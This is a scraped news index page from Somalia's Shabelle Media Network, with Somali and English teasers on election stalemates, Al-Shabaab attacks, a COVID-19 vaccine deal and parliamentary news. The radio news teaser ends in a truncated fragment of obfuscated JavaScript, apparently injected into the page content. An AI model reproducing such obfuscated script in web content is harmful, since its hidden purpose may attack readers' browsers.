Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Opp. council concerned over election stalemate

Somalia's Council of Presidential Candidates on Thursday expressed concern over the collapse of the most recent round of election talks.

Soldiers killed in army base ambush

At least two Somali soldiers were killed and several others wounded in an attack by Al-Shabaab terrorists on an army base in...

Sawirro: Guddoomiye Cumar Filish oo soo xiray shirweyne muhiim ah

Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Cumar Maxamuud Maxamed Filish ayaa soo xiray Shir weynihii 1-aad ee wadatashiga horumarinta waxbarashada...

Mas’uuliyiin ka tirsan K/Galbeed oo ka qeybgalay aaska caruurtii lagu dilay Baydhabo

Wasiiro ka tirsan koonfur galbeed ,ayaa manta ka qeybgalay aaska laba caruur ah walaalo ah oo saaka aroortii meydkooda laga heley duleelka...

Wasiiro ka tirsan XF Soomaaliya oo kormeer sameeyey + Sawirro

Wasiirada Maaliyadda iiyo Howlaha guud ee xukuumadda federaalka Soomaaliya ayaa maanta kormeerey dib u dhiska ka socda guriga Hooyooyinka Qaranka ee Zaynab...

Ciidamada DF & kuwa Jubbaland oo howl-gal ku dilay xubno ka tirsanaa Al-Shabaab

Wararka ka imaanaya gobolka Jubbada Hoose ayaa sheegaya in saacadihii lasoo dhaafay ciidamada dowladda iyo kuwa Jubbaland ay howl-gallo ka dhan ah...

Somalia pens deal with China’s Sinopharm for 200,000 COVID-19 vaccines

Somalia has signed a deal with Sinopharm, the Chinese company that produces the Sinovac COVID-19 vaccine, for the delivery of 200,000 doses.

Labo caruur ah oo si arxan darro ahaa loogu dilay duleedka Baydhabo

Meydadka caruur si arxan darro ahaa loo dilay ayaa waxaa saaka laga helay duleedka magaalada Baydhabo ee xarunta gobolka Bay, sida ay...

Maxay ka wada-hadleen beesha caalamka & qaar ka mid ah madax goboleedyada?

Wakiilada Beesha Caalamka ayaa xalay magaalada Muqdisho kulan gaar ah kula yeeshay madaxweynayaasha dowlad goboleedyada HirShabelle, Koonfur Galbeed iyo Galmudug oo taageersan...

Dhageyso: Warka subax ee Idaacadda Shabelle

Halkan hoose ka dhageyso warka subax Idaacadda Shabelle ee magaalada Muqdisho. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return...

WARAR KALE

Ra’iisul Wasaare Xamsa oo Hambalyo u Diray Guddoomiyaha Cusub ee Golaha Shacabka

Muqdisho – Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa hambalyo u diray Guddoomiyaha cusub ee Golaha Shacabka Baarlamaanka Federaalka Soomaaliya,...

Aqalka Sare ee Baarlamaanka Soomaaliya oo Ansixiyay Qorshe-hawleedka Kalfadhiga 8-aad

MUQDISHO - Guddoomiyaha Aqalka Sare ee Baarlamaanka Federaalka Soomaaliya, Mudane Cabdi Xaashi Cabdullaahi, oo ay weheliyaan Guddoomiye Ku-xigeenka Koowaad, Mudane Cali Shacbaan Ibraahim, iyo...

Abdulkadir Mohamed Nur elected Lower House speaker with 142 votes

MOGADISHU – Abdulkadir Mohamed Nur was elected speaker of Somalia’s House of the People on Monday, securing 142 votes in a parliamentary election held...